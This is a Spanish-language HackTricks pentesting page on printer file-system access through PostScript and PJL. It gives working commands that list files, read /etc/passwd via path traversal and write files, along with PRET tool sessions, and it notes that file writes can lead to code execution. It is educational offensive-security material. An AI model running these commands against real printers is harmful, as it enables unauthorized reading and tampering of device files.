mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 08:30:57 +00:00
106 lines
5.4 KiB
Markdown
106 lines
5.4 KiB
Markdown
<details>
|
|
|
|
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Otras formas de apoyar a HackTricks:
|
|
|
|
* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue**me en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
|
|
## **PostScript**
|
|
|
|
Recupera información sensible como archivos de configuración o trabajos de impresión almacenados, RCE escribiendo archivos (como editar scripts rc o reemplazar archivos binarios). Se definen construcciones de lenguaje legítimas para **PostScript** y **PJL** para **acceder al sistema de archivos**.
|
|
|
|
Accede al sistema de archivos con PostScript (nota que podría estar en un entorno aislado limitando a acciones inofensivas):
|
|
```bash
|
|
> /str 256 string def (%*%../*) % list all files
|
|
> {==} str filenameforall
|
|
< (%disk0%../webServer/home/device.html)
|
|
< (%disk0%../webServer/.java.login.config)
|
|
< (%disk0%../webServer/config/soe.xml)
|
|
|
|
> /byte (0) def % read from file
|
|
> /infile (../../../etc/passwd) (r) file def
|
|
> { infile read {byte exch 0 exch put
|
|
> (%stdout) (w) file byte writestring}
|
|
> {infile closefile exit} ifelse
|
|
> } loop
|
|
< root::0:0::/:/bin/dlsh
|
|
|
|
> /outfile (test.txt) (w+) file def}} % write to file
|
|
> outfile (Hello World!) writestring
|
|
> outfile closefile
|
|
```
|
|
Puede utilizar comandos de [PRET](https://github.com/RUB-NDS/PRET): `ls`, `get`, `put`, `append`, `delete`, `rename`, `find`, `mirror`, `touch`, `mkdir`, `cd`, `pwd`, `chvol`, `traversal`, `format`, `fuzz` y `df`:
|
|
```
|
|
./pret.py -q printer ps
|
|
Connection to printer established
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
printer:/> ls ../..
|
|
d - Jan 1 1970 (created Jan 1 1970) bootdev
|
|
d - Jan 1 1970 (created Jan 1 1970) dsk_jdi
|
|
d - Jan 1 1970 (created Jan 1 1970) dsk_jdi_ss
|
|
d - Jan 1 1970 (created Jan 1 1970) dsk_ram0
|
|
d - Jan 1 1970 (created Jan 1 1970) etc
|
|
d - Jan 1 1970 (created Jan 1 1970) tmp
|
|
d - Jan 1 1970 (created Jan 1 1970) webServer
|
|
```
|
|
## PJL
|
|
```
|
|
> @PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535 (list all files)
|
|
< .\:\:TYPE=DIR
|
|
< ..\:\:TYPE=DIR
|
|
< PostScript TYPE=DIR
|
|
< PJL TYPE=DIR
|
|
< saveDevice TYPE=DIR
|
|
< webServer TYPE=DIR
|
|
|
|
> @PJL FSQUERY NAME="0:\..\..\etc\passwd" (read from file)
|
|
< @PJL FSQUERY NAME="0:\..\..\etc\passwd" TYPE=FILE SIZE=23
|
|
> @PJL FSUPLOAD NAME="0:\..\..\etc\passwd" OFFSET=0 SIZE=23
|
|
< root::0:0::/:/bin/dlsh
|
|
|
|
> @PJL FSDOWNLOAD SIZE=13 NAME="0:\test.txt" (write to file)
|
|
> Hello World!
|
|
```
|
|
De todos modos, el acceso a archivos con PJL no es compatible con muchas impresoras.
|
|
|
|
Puede utilizar comandos de [PRET](https://github.com/RUB-NDS/PRET): `ls`, `get`, `put`, `append`, `delete`, `find`, `mirror`, `touch`, `mkdir`, `cd`, `pwd`, `chvol`, `traversal`, `format`, `fuzz` y `df`:
|
|
```
|
|
./pret.py -q printer pjl
|
|
Connection to printer established
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
printer:/> ls ..
|
|
d - bootdev
|
|
d - dsk_jdi
|
|
d - dsk_jdi_ss
|
|
d - dsk_ram0
|
|
d - etc
|
|
d - lrt
|
|
d - tmp
|
|
d - webServer
|
|
d - xps
|
|
```
|
|
**Aprende más sobre posibles formas de evadir sandbox utilizando limitaciones de PostScript y PJL en** [**http://hacking-printers.net/wiki/index.php/File\_system\_access**](http://hacking-printers.net/wiki/index.php/File\_system\_access)
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprende a hackear AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Otras formas de apoyar a HackTricks:
|
|
|
|
* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|